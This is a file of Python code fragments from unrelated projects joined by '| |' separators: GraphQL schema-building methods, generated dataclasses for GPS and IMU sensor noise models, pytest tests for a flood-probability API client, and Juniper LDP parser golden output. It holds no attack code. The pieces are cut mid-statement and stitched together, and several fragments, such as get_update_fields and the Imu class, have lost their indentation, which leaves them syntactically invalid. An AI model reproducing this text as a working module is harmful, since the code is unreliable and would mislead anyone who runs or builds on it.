                        ptr = ancestor
                        break
            target = self._get_target(ptr)
            if target is not None:
                # Object-typed pointers accept the standard query args;
                # scalar pointers take no arguments.
                ptgt = ptr.get_target(self.edb_schema)
                if not isinstance(ptgt, s_objtypes.ObjectType):
                    objargs = None
                else:
                    objargs = self._get_query_args(
                        ptgt.get_name(self.edb_schema))
                fields[pn] = GraphQLField(target, args=objargs)
    return fields
def get_filter_fields(
    self,
    typename: s_name.QualName,
    nested: bool = False,
) -> Dict[str, GraphQLInputField]:
    """Build the input fields of the Filter input object for *typename*.

    Top-level filters (nested=False) get the boolean combinators
    and/or/not; nested filters get the 'exists' test instead.  Each
    exposable pointer then contributes one field: object-typed pointers
    use a (lazily constructed, recursive) NestedFilter input type,
    scalar pointers use the pre-generated Filter* input type for their
    GraphQL scalar.
    """
    selftype = self._gql_inobjtypes[str(typename)]
    fields = {}
    if not nested:
        fields['and'] = GraphQLInputField(
            GraphQLList(GraphQLNonNull(selftype)))
        fields['or'] = GraphQLInputField(
            GraphQLList(GraphQLNonNull(selftype)))
        fields['not'] = GraphQLInputField(selftype)
    else:
        # Nested filters offer the 'exists' operation instead of the
        # boolean combinators.
        fields['exists'] = GraphQLInputField(GraphQLBoolean)
    edb_type = self.edb_schema.get(typename, type=s_objtypes.ObjectType)
    pointers = edb_type.get_pointers(self.edb_schema)
    names = sorted(pointers.keys(self.edb_schema))
    for unqual_name in names:
        name = str(unqual_name)
        if name == '__type__':
            continue
        if name in fields:
            raise g_errors.GraphQLCoreError(
                f"{name!r} of {typename} clashes with special "
                "reserved fields required for GraphQL conversion"
            )
        ptr = edb_type.getptr(self.edb_schema, unqual_name)
        edb_target = ptr.get_target(self.edb_schema)
        assert edb_target is not None
        if isinstance(edb_target, s_objtypes.ObjectType):
            t_name = edb_target.get_name(self.edb_schema)
            gql_name = self.get_input_name(
                'NestedFilter', self.get_gql_name(t_name))
            intype = self._gql_inobjtypes.get(gql_name)
            if intype is None:
                # construct a nested filter type; the fields callback
                # recurses into this method with nested=True
                intype = GraphQLInputObjectType(
                    name=gql_name,
                    fields=partial(self.get_filter_fields, t_name, True),
                )
                self._gql_inobjtypes[gql_name] = intype
        elif not edb_target.is_scalar():
            # only object types (above) and scalars are filterable
            continue
        else:
            target = self._convert_edb_type(edb_target)
            if target is None:
                # don't expose this
                continue
            if isinstance(target, GraphQLNamedType):
                intype = self._gql_inobjtypes.get(f'Filter{target.name}')
            else:
                raise AssertionError(
                    f'unexpected GraphQL type: {target!r}'
                )
        if intype:
            fields[name] = GraphQLInputField(intype)
    return fields
def get_insert_fields(
    self,
    typename: s_name.QualName,
) -> Dict[str, GraphQLInputField]:
    """Build the input fields of the Insert input object for *typename*.

    Object-typed pointers become (lists of) nested insert input
    objects; scalar and array pointers map to the corresponding
    Insert* input scalars.  Pointers whose target cannot be exposed in
    GraphQL are skipped, as is __type__.

    Fixes vs. the original: the loop no longer rebinds the 'typename'
    parameter, and the stray '"' in the AssertionError message is
    corrected to ':'.
    """
    fields = {}
    edb_type = self.edb_schema.get(typename, type=s_objtypes.ObjectType)
    pointers = edb_type.get_pointers(self.edb_schema)
    names = sorted(pointers.keys(self.edb_schema))
    for unqual_name in names:
        name = str(unqual_name)
        if name == '__type__':
            continue
        ptr = edb_type.getptr(self.edb_schema, unqual_name)
        edb_target = ptr.get_target(self.edb_schema)
        intype: GraphQLInputType
        if isinstance(edb_target, s_objtypes.ObjectType):
            # Use a dedicated local name -- do not clobber 'typename'.
            target_name = edb_target.get_name(self.edb_schema)
            inobjtype = self._gql_inobjtypes.get(
                f'NestedInsert{target_name}')
            if inobjtype is not None:
                intype = inobjtype
            else:
                # construct a nested insert type
                intype = self._make_generic_nested_insert_type(edb_target)
            intype = self._wrap_input_type(ptr, intype)
            fields[name] = GraphQLInputField(intype)
        elif (
            isinstance(edb_target, s_scalars.ScalarType)
            or isinstance(edb_target, s_types.Array)
        ):
            target = self._convert_edb_type(edb_target)
            if target is None:
                # don't expose this
                continue
            if isinstance(target, GraphQLList):
                # Arrays arrive as [NonNull(element)]; unwrap twice to
                # find the element's Insert scalar.
                inobjtype = self._gql_inobjtypes.get(
                    f'Insert{target.of_type.of_type.name}')
                assert inobjtype is not None
                intype = GraphQLList(GraphQLNonNull(inobjtype))
            elif edb_target.is_enum(self.edb_schema):
                enum_name = edb_target.get_name(self.edb_schema)
                assert isinstance(enum_name, s_name.QualName)
                inobjtype = self._gql_inobjtypes.get(f'Insert{enum_name}')
                assert inobjtype is not None
                intype = inobjtype
            elif isinstance(target, GraphQLNamedType):
                inobjtype = self._gql_inobjtypes.get(
                    f'Insert{target.name}')
                assert inobjtype is not None
                intype = inobjtype
            else:
                raise AssertionError(
                    f'unexpected GraphQL type: {target!r}'
                )
            intype = self._wrap_input_type(ptr, intype)
            if intype:
                fields[name] = GraphQLInputField(intype)
        else:
            continue
    return fields
def get_update_fields(
self,
typename: s_name.QualName,
) -> Dict[str, GraphQLInputField]:
fields = {}
edb_type = self.edb_schema.get(typename, type=s_objtypes.ObjectType)
pointers = edb_type.get_pointers(self.edb_schema)
names = sorted(pointers.keys(self.edb_schema))
for unqual_name in names:
name = str(unqual_name)
if name == '__type__':
continue
ptr = edb_type.getptr(self.edb_schema, unqual_name)
edb_target = ptr.get_target(self.edb_schema)
if isinstance(edb_target, s_objtypes.ObjectType):
intype = self._gql_inobjtypes.get(
f'UpdateOp{typename}__{name}')
if intype is None:
# the links can only be updated by selecting some
# objects, meaning | |
metadata={
"type": "Element",
"namespace": "",
},
)
velocity_sensing: Optional["Sensor.Gps.VelocitySensing"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
},
)
# NOTE(review): this looks like auto-generated XML data-binding code (xsdata
# style dataclasses mirroring the SDF sensor schema; the metadata dicts drive
# the (de)serializer) -- prefer regenerating from the schema over hand-editing.
@dataclass
class PositionSensing:
    """
    Parameters related to GPS position measurement.

    Parameters
    ----------
    horizontal: Noise parameters for horizontal position
        measurement, in units of meters.
    vertical: Noise parameters for vertical position
        measurement, in units of meters.
    """
    horizontal: Optional["Sensor.Gps.PositionSensing.Horizontal"] = field(
        default=None,
        metadata={
            "type": "Element",
            "namespace": "",
        },
    )
    vertical: Optional["Sensor.Gps.PositionSensing.Vertical"] = field(
        default=None,
        metadata={
            "type": "Element",
            "namespace": "",
        },
    )

    @dataclass
    class Horizontal:
        """
        Noise parameters for horizontal position measurement, in units
        of meters.

        Parameters
        ----------
        noise: The properties of a sensor noise model.
        """
        noise: Optional["Sensor.Gps.PositionSensing.Horizontal.Noise"] = field(
            default=None,
            metadata={
                "type": "Element",
                "namespace": "",
                "required": True,
            },
        )

        @dataclass
        class Noise:
            """
            The properties of a sensor noise model.

            Parameters
            ----------
            mean: For type "gaussian*", the mean of the Gaussian
                distribution from which noise values are drawn.
            stddev: For type "gaussian*", the standard deviation
                of the Gaussian distribution from which noise
                values are drawn.
            bias_mean: For type "gaussian*", the mean of the
                Gaussian distribution from which bias values are
                drawn.
            bias_stddev: For type "gaussian*", the standard
                deviation of the Gaussian distribution from
                which bias values are drawn.
            precision: For type "gaussian_quantized", the
                precision of output signals. A value of
                zero implies infinite precision / no
                quantization.
            type: The type of noise. Currently supported types
                are: "none" (no noise). "gaussian"
                (draw noise values independently for each
                measurement from a Gaussian distribution).
                "gaussian_quantized" ("gaussian" plus
                quantization of outputs (ie. rounding))
            """
            mean: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            stddev: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            bias_mean: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            bias_stddev: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            precision: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            # 'type' is an XML attribute, not a child element.
            type: Optional[str] = field(
                default=None,
                metadata={
                    "type": "Attribute",
                    "required": True,
                },
            )

    @dataclass
    class Vertical:
        """
        Noise parameters for vertical position measurement, in units of
        meters.

        Parameters
        ----------
        noise: The properties of a sensor noise model.
        """
        noise: Optional["Sensor.Gps.PositionSensing.Vertical.Noise"] = field(
            default=None,
            metadata={
                "type": "Element",
                "namespace": "",
                "required": True,
            },
        )

        @dataclass
        class Noise:
            """
            The properties of a sensor noise model.

            Parameters
            ----------
            mean: For type "gaussian*", the mean of the Gaussian
                distribution from which noise values are drawn.
            stddev: For type "gaussian*", the standard deviation
                of the Gaussian distribution from which noise
                values are drawn.
            bias_mean: For type "gaussian*", the mean of the
                Gaussian distribution from which bias values are
                drawn.
            bias_stddev: For type "gaussian*", the standard
                deviation of the Gaussian distribution from
                which bias values are drawn.
            precision: For type "gaussian_quantized", the
                precision of output signals. A value of
                zero implies infinite precision / no
                quantization.
            type: The type of noise. Currently supported types
                are: "none" (no noise). "gaussian"
                (draw noise values independently for each
                measurement from a Gaussian distribution).
                "gaussian_quantized" ("gaussian" plus
                quantization of outputs (ie. rounding))
            """
            mean: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            stddev: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            bias_mean: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            bias_stddev: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            precision: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            # 'type' is an XML attribute, not a child element.
            type: Optional[str] = field(
                default=None,
                metadata={
                    "type": "Attribute",
                    "required": True,
                },
            )
# NOTE(review): auto-generated XML data binding (xsdata style) -- prefer
# regenerating from the schema over hand-editing.
@dataclass
class VelocitySensing:
    """
    Parameters related to GPS velocity measurement.

    (The generated docstring said "position"; the field documentation
    below shows these are velocity noise parameters in meters/second.)

    Parameters
    ----------
    horizontal: Noise parameters for horizontal velocity
        measurement, in units of meters/second.
    vertical: Noise parameters for vertical velocity
        measurement, in units of meters/second.
    """
    horizontal: Optional["Sensor.Gps.VelocitySensing.Horizontal"] = field(
        default=None,
        metadata={
            "type": "Element",
            "namespace": "",
        },
    )
    vertical: Optional["Sensor.Gps.VelocitySensing.Vertical"] = field(
        default=None,
        metadata={
            "type": "Element",
            "namespace": "",
        },
    )

    @dataclass
    class Horizontal:
        """
        Noise parameters for horizontal velocity measurement, in units
        of meters/second.

        Parameters
        ----------
        noise: The properties of a sensor noise model.
        """
        noise: Optional["Sensor.Gps.VelocitySensing.Horizontal.Noise"] = field(
            default=None,
            metadata={
                "type": "Element",
                "namespace": "",
                "required": True,
            },
        )

        @dataclass
        class Noise:
            """
            The properties of a sensor noise model.

            Parameters
            ----------
            mean: For type "gaussian*", the mean of the Gaussian
                distribution from which noise values are drawn.
            stddev: For type "gaussian*", the standard deviation
                of the Gaussian distribution from which noise
                values are drawn.
            bias_mean: For type "gaussian*", the mean of the
                Gaussian distribution from which bias values are
                drawn.
            bias_stddev: For type "gaussian*", the standard
                deviation of the Gaussian distribution from
                which bias values are drawn.
            precision: For type "gaussian_quantized", the
                precision of output signals. A value of
                zero implies infinite precision / no
                quantization.
            type: The type of noise. Currently supported types
                are: "none" (no noise). "gaussian"
                (draw noise values independently for each
                measurement from a Gaussian distribution).
                "gaussian_quantized" ("gaussian" plus
                quantization of outputs (ie. rounding))
            """
            mean: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            stddev: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            bias_mean: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            bias_stddev: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            precision: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            # 'type' is an XML attribute, not a child element.
            type: Optional[str] = field(
                default=None,
                metadata={
                    "type": "Attribute",
                    "required": True,
                },
            )

    @dataclass
    class Vertical:
        """
        Noise parameters for vertical velocity measurement, in units of
        meters/second.

        Parameters
        ----------
        noise: The properties of a sensor noise model.
        """
        noise: Optional["Sensor.Gps.VelocitySensing.Vertical.Noise"] = field(
            default=None,
            metadata={
                "type": "Element",
                "namespace": "",
                "required": True,
            },
        )

        @dataclass
        class Noise:
            """
            The properties of a sensor noise model.

            Parameters
            ----------
            mean: For type "gaussian*", the mean of the Gaussian
                distribution from which noise values are drawn.
            stddev: For type "gaussian*", the standard deviation
                of the Gaussian distribution from which noise
                values are drawn.
            bias_mean: For type "gaussian*", the mean of the
                Gaussian distribution from which bias values are
                drawn.
            bias_stddev: For type "gaussian*", the standard
                deviation of the Gaussian distribution from
                which bias values are drawn.
            precision: For type "gaussian_quantized", the
                precision of output signals. A value of
                zero implies infinite precision / no
                quantization.
            type: The type of noise. Currently supported types
                are: "none" (no noise). "gaussian"
                (draw noise values independently for each
                measurement from a Gaussian distribution).
                "gaussian_quantized" ("gaussian" plus
                quantization of outputs (ie. rounding))
            """
            mean: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            stddev: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            bias_mean: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            bias_stddev: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            precision: float = field(
                default=0.0,
                metadata={
                    "type": "Element",
                    "namespace": "",
                    "required": True,
                },
            )
            # 'type' is an XML attribute, not a child element.
            type: Optional[str] = field(
                default=None,
                metadata={
                    "type": "Attribute",
                    "required": True,
                },
            )
@dataclass
class Imu:
"""
These elements are specific to the IMU sensor.
Parameters
----------
topic: Topic on which data is published.
noise: The properties of the noise model that should be applied
to generated data
"""
topic: str = field(
default="__default_topic__",
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
noise: Optional["Sensor.Imu.Noise"] = field(
default=None,
metadata={
"type": "Element",
"namespace": "",
},
)
@dataclass
class Noise:
"""
The properties of the noise model that should be applied to
generated data.
Parameters
----------
type: The type of noise. Currently supported types are:
"gaussian" (draw noise values independently for each
beam from a Gaussian distribution).
rate: Noise parameters for angular rates.
accel: Noise parameters for linear accelerations.
"""
type: str = field(
default="gaussian",
metadata={
"type": "Element",
"namespace": "",
"required": True,
},
)
rate: Optional["Sensor.Imu.Noise.Rate"] = field(
default=None,
metadata={
| |
not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("bin") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("low") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("mid") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("high") is not None
probability = fs.probability.get_count([39], 'state', csv=True, output_dir=tmpdir)
assert len(probability) == 1
assert probability[0].valid_id is True
assert probability[0].fsid == "39"
assert probability[0].count is not None
assert probability[0].count[0].get("year") is not None
assert probability[0].count[0].get("data") is not None
assert probability[0].count[0].get("data")[0].get("returnPeriod") is not None
assert probability[0].count[0].get("data")[0].get("data") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("bin") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("low") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("mid") is not None
assert probability[0].count[0].get("data")[0].get("data")[0].get("count").get("high") is not None
class TestProbabilityCountSummary:
    """End-to-end checks for ``fs.probability.get_count_summary``.

    NOTE: these tests call the live First Street API, so network access
    and valid credentials are required for them to pass.
    """

    def test_empty(self):
        # An empty FSID list is rejected before any request is issued.
        with pytest.raises(InvalidArgument):
            fs.probability.get_count_summary([], "")

    def test_wrong_fsid_type(self):
        # A bare integer (not a list) is likewise rejected up front.
        with pytest.raises(InvalidArgument):
            fs.probability.get_count_summary(19)

    def test_invalid(self):
        bad_fsid = [0]
        results = fs.probability.get_count_summary(bad_fsid)
        assert len(results) == 1
        item = results[0]
        assert item.fsid == str(bad_fsid[0])
        assert item.state is None
        assert item.valid_id is False

    def test_single(self):
        fsid = [394406220]
        results = fs.probability.get_count_summary(fsid)
        assert len(results) == 1
        item = results[0]
        assert item.fsid == str(fsid[0])
        assert item.state is not None
        assert item.valid_id is True

    def test_multiple(self):
        fsid = [394406220, 193139123]
        results = fs.probability.get_count_summary(fsid)
        assert len(results) == 2
        # Responses may arrive in any order; sort descending by FSID string.
        results.sort(key=lambda item: item.fsid, reverse=True)
        first, second = results
        assert first.fsid == str(fsid[0])
        assert second.fsid == str(fsid[1])
        assert first.state is not None
        assert first.valid_id is True
        assert second.state is not None
        assert second.valid_id is True

    def test_single_csv(self, tmpdir):
        fsid = [394406220]
        results = fs.probability.get_count_summary(fsid, csv=True, output_dir=tmpdir)
        assert len(results) == 1
        item = results[0]
        assert item.fsid == str(fsid[0])
        assert item.state is not None
        assert item.valid_id is True

    def test_multiple_csv(self, tmpdir):
        fsid = [394406220, 193139123]
        results = fs.probability.get_count_summary(fsid, csv=True, output_dir=tmpdir)
        assert len(results) == 2
        results.sort(key=lambda item: item.fsid, reverse=True)
        first, second = results
        assert first.fsid == str(fsid[0])
        assert second.fsid == str(fsid[1])
        assert first.state is not None
        assert first.valid_id is True
        assert second.state is not None
        assert second.valid_id is True

    def test_mixed_invalid(self):
        fsid = [394406220, 0]
        results = fs.probability.get_count_summary(fsid)
        assert len(results) == 2
        results.sort(key=lambda item: item.fsid, reverse=True)
        first, second = results
        assert first.fsid == str(fsid[0])
        assert second.fsid == str(fsid[1])
        assert first.state is not None
        assert first.valid_id is True
        assert second.state is None
        assert second.valid_id is False

    def test_mixed_invalid_csv(self, tmpdir):
        fsid = [394406220, 0]
        results = fs.probability.get_count_summary(fsid, csv=True, output_dir=tmpdir)
        assert len(results) == 2
        results.sort(key=lambda item: item.fsid, reverse=True)
        first, second = results
        assert first.fsid == str(fsid[0])
        assert second.fsid == str(fsid[1])
        assert first.state is not None
        assert first.valid_id is True
        assert second.state is None
        assert second.valid_id is False

    def test_coordinate_invalid(self, tmpdir):
        # Coordinates in the middle of nowhere resolve to no property.
        results = fs.probability.get_count_summary([(82.487671, -62.374322)], csv=True, output_dir=tmpdir)
        assert len(results) == 1
        assert results[0].state is None
        assert results[0].valid_id is False

    def test_single_coordinate(self, tmpdir):
        results = fs.probability.get_count_summary([(40.7079652311, -74.0021455387)], csv=True, output_dir=tmpdir)
        assert len(results) == 1
        assert results[0].state is not None
        assert results[0].valid_id is True

    def test_address_invalid_404(self, tmpdir):
        results = fs.probability.get_count_summary(["Shimik, Nunavut, Canada"], csv=True, output_dir=tmpdir)
        assert len(results) == 1
        assert results[0].state is None
        assert results[0].valid_id is False

    def test_address_invalid_500(self, tmpdir):
        results = fs.probability.get_count_summary(["Toronto, Ontario, Canada"], csv=True, output_dir=tmpdir)
        assert len(results) == 1
        assert results[0].state is None
        assert results[0].valid_id is False

    def test_single_address(self, tmpdir):
        results = fs.probability.get_count_summary(["247 Water St, New York, New York"],
                                                   csv=True, output_dir=tmpdir)
        assert len(results) == 1
        assert results[0].state is not None
        assert results[0].valid_id is True

    def test_one_of_each(self, tmpdir):
        results = fs.probability.get_count_summary([394406220], csv=True, output_dir=tmpdir)
        assert len(results) == 1
        item = results[0]
        assert item.valid_id is True
        assert item.fsid == "394406220"
        assert item.neighborhood is not None
        assert item.city is not None
        assert item.state is not None
        assert item.zcta is not None
        assert item.county is not None
        assert item.cd is not None
        assert item.tract is not None
class TestProbabilityCumulative:
    """End-to-end checks for ``fs.probability.get_cumulative``.

    NOTE: these tests call the live First Street API; network access and
    valid credentials are required for them to pass.
    """

    def test_empty(self):
        # Empty FSID list is rejected client-side.
        with pytest.raises(InvalidArgument):
            fs.probability.get_cumulative([], "")

    def test_wrong_fsid_type(self):
        # A bare int instead of a list is rejected client-side.
        with pytest.raises(InvalidArgument):
            fs.probability.get_cumulative(190836953)

    def test_invalid(self):
        # Unknown FSID: marked invalid, payload left empty.
        fsid = [0000000]
        probability = fs.probability.get_cumulative(fsid)
        assert len(probability) == 1
        assert probability[0].fsid == str(fsid[0])
        assert probability[0].cumulative is None
        assert probability[0].valid_id is False

    def test_single(self):
        fsid = [190836953]
        probability = fs.probability.get_cumulative(fsid)
        assert len(probability) == 1
        assert probability[0].fsid == str(fsid[0])
        assert probability[0].cumulative is not None
        assert probability[0].valid_id is True

    def test_multiple(self):
        fsid = [190836953, 193139123]
        probability = fs.probability.get_cumulative(fsid)
        assert len(probability) == 2
        # Responses may arrive in any order; sort ascending by FSID string.
        probability.sort(key=lambda x: x.fsid)
        assert probability[0].fsid == str(fsid[0])
        assert probability[1].fsid == str(fsid[1])
        assert probability[0].cumulative is not None
        assert probability[0].valid_id is True
        assert probability[1].cumulative is not None
        assert probability[1].valid_id is True

    def test_single_csv(self, tmpdir):
        # csv=True additionally writes a CSV file into tmpdir.
        fsid = [190836953]
        probability = fs.probability.get_cumulative(fsid, csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].fsid == str(fsid[0])
        assert probability[0].cumulative is not None
        assert probability[0].valid_id is True

    def test_multiple_csv(self, tmpdir):
        fsid = [190836953, 193139123]
        probability = fs.probability.get_cumulative(fsid, csv=True, output_dir=tmpdir)
        assert len(probability) == 2
        probability.sort(key=lambda x: x.fsid)
        assert probability[0].fsid == str(fsid[0])
        assert probability[1].fsid == str(fsid[1])
        assert probability[0].cumulative is not None
        assert probability[0].valid_id is True
        assert probability[1].cumulative is not None
        assert probability[1].valid_id is True

    def test_mixed_invalid(self):
        # One good FSID and one bad one: both returned, flagged accordingly.
        fsid = [190836953, 000000000]
        probability = fs.probability.get_cumulative(fsid)
        assert len(probability) == 2
        probability.sort(key=lambda x: x.fsid, reverse=True)
        assert probability[0].fsid == str(fsid[0])
        assert probability[1].fsid == str(fsid[1])
        assert probability[0].cumulative is not None
        assert probability[0].valid_id is True
        assert probability[1].cumulative is None
        assert probability[1].valid_id is False

    def test_mixed_invalid_csv(self, tmpdir):
        fsid = [190836953, 000000000]
        probability = fs.probability.get_cumulative(fsid, csv=True, output_dir=tmpdir)
        assert len(probability) == 2
        probability.sort(key=lambda x: x.fsid, reverse=True)
        assert probability[0].fsid == str(fsid[0])
        assert probability[1].fsid == str(fsid[1])
        assert probability[0].cumulative is not None
        assert probability[0].valid_id is True
        assert probability[1].cumulative is None
        assert probability[1].valid_id is False

    def test_coordinate_invalid(self, tmpdir):
        # Coordinates that resolve to no property.
        probability = fs.probability.get_cumulative([(82.487671, -62.374322)], csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].cumulative is None
        assert probability[0].valid_id is False

    def test_single_coordinate(self, tmpdir):
        probability = fs.probability.get_cumulative([(40.7079652311, -74.0021455387)], csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].cumulative is not None
        assert probability[0].valid_id is True

    def test_address_invalid_404(self, tmpdir):
        probability = fs.probability.get_cumulative(["Shimik, Nunavut, Canada"], csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].cumulative is None
        assert probability[0].valid_id is False

    def test_address_invalid_500(self, tmpdir):
        probability = fs.probability.get_cumulative(["Toronto, Ontario, Canada"], csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].cumulative is None
        assert probability[0].valid_id is False

    def test_single_address(self, tmpdir):
        probability = fs.probability.get_cumulative(["247 Water St, New York, New York"], csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].cumulative is not None
        assert probability[0].valid_id is True

    def test_one_of_each(self, tmpdir):
        # Spot-check the nested shape of a full cumulative payload.
        probability = fs.probability.get_cumulative([390000439], csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].valid_id is True
        assert probability[0].fsid == "390000439"
        assert probability[0].cumulative is not None
        assert probability[0].cumulative[0].get("year") is not None
        assert probability[0].cumulative[0].get("data") is not None
        assert probability[0].cumulative[0].get("data")[0].get("threshold") is not None
        assert probability[0].cumulative[0].get("data")[0].get("data") is not None
        assert probability[0].cumulative[0].get("data")[0].get("data").get("low") is not None
        assert probability[0].cumulative[0].get("data")[0].get("data").get("mid") is not None
        assert probability[0].cumulative[0].get("data")[0].get("data").get("high") is not None
class TestProbabilityDepth:
    def test_empty(self):
        # Empty FSID list is rejected client-side.
        with pytest.raises(InvalidArgument):
            fs.probability.get_depth([], "")

    def test_wrong_fsid_type(self):
        # A bare int instead of a list is rejected client-side.
        with pytest.raises(InvalidArgument):
            fs.probability.get_depth(190836953)

    def test_invalid(self):
        # Unknown FSID: marked invalid, depth payload left empty.
        fsid = [0000000]
        probability = fs.probability.get_depth(fsid)
        assert len(probability) == 1
        assert probability[0].fsid == str(fsid[0])
        assert probability[0].depth is None
        assert probability[0].valid_id is False

    def test_single(self):
        fsid = [190836953]
        probability = fs.probability.get_depth(fsid)
        assert len(probability) == 1
        assert probability[0].fsid == str(fsid[0])
        assert probability[0].depth is not None
        assert probability[0].valid_id is True

    def test_multiple(self):
        fsid = [190836953, 193139123]
        probability = fs.probability.get_depth(fsid)
        assert len(probability) == 2
        # Responses may arrive in any order; sort ascending by FSID string.
        probability.sort(key=lambda x: x.fsid)
        assert probability[0].fsid == str(fsid[0])
        assert probability[1].fsid == str(fsid[1])
        assert probability[0].depth is not None
        assert probability[0].valid_id is True
        assert probability[1].depth is not None
        assert probability[1].valid_id is True

    def test_single_csv(self, tmpdir):
        # csv=True additionally writes a CSV file into tmpdir.
        fsid = [190836953]
        probability = fs.probability.get_depth(fsid, csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].fsid == str(fsid[0])
        assert probability[0].depth is not None
        assert probability[0].valid_id is True

    def test_multiple_csv(self, tmpdir):
        fsid = [190836953, 193139123]
        probability = fs.probability.get_depth(fsid, csv=True, output_dir=tmpdir)
        assert len(probability) == 2
        probability.sort(key=lambda x: x.fsid)
        assert probability[0].fsid == str(fsid[0])
        assert probability[1].fsid == str(fsid[1])
        assert probability[0].depth is not None
        assert probability[0].valid_id is True
        assert probability[1].depth is not None
        assert probability[1].valid_id is True

    def test_mixed_invalid(self):
        # One good FSID and one bad one: both returned, flagged accordingly.
        fsid = [190836953, 000000000]
        probability = fs.probability.get_depth(fsid)
        assert len(probability) == 2
        probability.sort(key=lambda x: x.fsid, reverse=True)
        assert probability[0].fsid == str(fsid[0])
        assert probability[1].fsid == str(fsid[1])
        assert probability[0].depth is not None
        assert probability[0].valid_id is True
        assert probability[1].depth is None
        assert probability[1].valid_id is False

    def test_mixed_invalid_csv(self, tmpdir):
        fsid = [190836953, 000000000]
        probability = fs.probability.get_depth(fsid, csv=True, output_dir=tmpdir)
        assert len(probability) == 2
        probability.sort(key=lambda x: x.fsid, reverse=True)
        assert probability[0].fsid == str(fsid[0])
        assert probability[1].fsid == str(fsid[1])
        assert probability[0].depth is not None
        assert probability[0].valid_id is True
        assert probability[1].depth is None
        assert probability[1].valid_id is False

    def test_coordinate_invalid(self, tmpdir):
        # Coordinates that resolve to no property.
        probability = fs.probability.get_depth([(82.487671, -62.374322)], csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].depth is None
        assert probability[0].valid_id is False

    def test_single_coordinate(self, tmpdir):
        probability = fs.probability.get_depth([(40.7079652311, -74.0021455387)], csv=True, output_dir=tmpdir)
        assert len(probability) == 1
        assert probability[0].depth is not None
        assert probability[0].valid_id is True
def test_address_invalid_404(self, tmpdir):
probability = fs.probability.get_depth(["Shimik, | |
loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 0
Total number of LDP labels allocated: 0
Total number of LDP labels freed: 0
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
golden_parsed_output_4 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-auto-targeted-session': {
'ldp-auto-targeted-dyn-tun-ses-count': 0,
'ldp-auto-targeted-session-enabled': 'disabled'
},
'ldp-bgp-export': 'enabled',
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'disabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-inet': 'enabled',
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-egress-fec-capability': {
'ldp-egress-fec-capability': 'entropy-label-capability'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-job-overview': {
'ldp-inbound-read-job-loop-quantum': 100,
'ldp-inbound-read-job-time-quantum': 1000,
'ldp-outbound-read-job-loop-quantum': 100,
'ldp-outbound-read-job-time-quantum': 1000,
